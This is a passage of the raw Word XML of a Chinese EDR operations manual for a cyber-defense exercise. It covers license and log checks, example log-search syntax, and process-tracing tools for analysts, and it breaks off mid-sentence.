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rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc130115382"/>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
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天擎E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统检查和安全监测分析手册</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>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firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合客户护网的目标信息系统情况和基础的网络安全防护能力（</w:t>
      </w:r>
      <w:r>
        <w:t>FW、WAF、IDS、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防病毒），在本次演习防护工作中需要部署终端E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，配合网络流量告警设备对网络告警进行终端定位，</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时能够结合威胁情报I</w:t>
      </w:r>
      <w:r>
        <w:t>OC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则，对一些内网横向渗透进行分析和定位。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>单位的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行的业务专网环境分别部署网络攻击安全监测分析设备，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>外网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署位置（以目标系统梳理后结果为依据）如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:spacing w:before="81" w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署完成后应检查</w:t>
      </w:r>
      <w:r>
        <w:t>授权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期限、终端采集、</w:t>
      </w:r>
      <w:r>
        <w:t>威胁情报和规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用情况等方面是否正常，确保护网期间可正常使用开展安全监测、分析和验证工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天擎E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统部署及检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc531790869"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>授权及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>授权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:spacing w:before="81" w:after="81"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5386070" cy="2593975"/>
            <wp:effectExtent l="0" t="0" r="24130" b="222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5386070" cy="2593975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>采集配置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5393055" cy="1842135"/>
            <wp:effectExtent l="0" t="0" r="17145" b="1206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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5393055" cy="1842135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启核晶防护：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5392420" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="17780" b="2095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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5392420" cy="2417445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据日志查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:spacing w:before="81" w:after="81"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5396230" cy="2007235"/>
            <wp:effectExtent l="0" t="0" r="13970" b="2476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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5396230" cy="2007235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统可用性检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc531790871"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>天擎</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>控制台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看最近</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>24小时是否有数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5396230" cy="2007235"/>
            <wp:effectExtent l="0" t="0" r="13970" b="2476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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5396230" cy="2007235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>建议通过和临近工作日的数据总量做对比，波动一般不会超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>30%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检查edr是否有异常：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>skylar6/logs/edr/edr.ERROR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看最新ERROR日志，可以通过ERROR提示排查问题原因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检查loog是否有异常：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>skylar6/logs/loog/loog.ERROR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看最新ERROR日志，可以通过ERROR提示排查问题原因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>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left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>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p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>奇安信E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监测及日志分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:r>
        <w:t>综述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:spacing w:before="81" w:after="81"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>终端采集能力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志分析工具：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在威胁追踪页面，选择一个日志类型，然后取消“过滤字段”的全部勾选，可以看到一条日志的原始字段和数据。可以根据原始字段进行检索，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>process_name:"powershell.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。可以用A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行“与”运算，O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行“或”运算 如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>process_name:"powershell.exe" AND mid:"ed70c28696f04926827648d2253d5d45"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="289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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程溯源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里指的根进程是</w:t>
      </w:r>
      <w:r>
        <w:t>EDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所能追到的进程，如一个进程启动时间E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gent要早或者使用DC</w:t>
      </w:r>
      <w:r>
        <w:t>OM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等手段断链，那么则没有办法追到真正的起始进程。一个要被溯源的进程可能来自E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自身告警，或者天眼等告警信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根进程追溯后的分析，需要根据具体情况分析，</w:t>
      </w:r>
      <w:r>
        <w:t>此时可借助第三方分析工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具包</w:t>
      </w:r>
      <w:r>
        <w:t>中的autoruns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（查看</w:t>
      </w:r>
      <w:r>
        <w:t>系统启动项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>、TCPView</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（网络</w:t>
      </w:r>
      <w:r>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>ARK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>工具如WKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>模块信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r>
        <w:t>抓包工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如Fiddler查看进程</w:t>
      </w:r>
      <w:r>
        <w:t>网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>EDR出现告警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
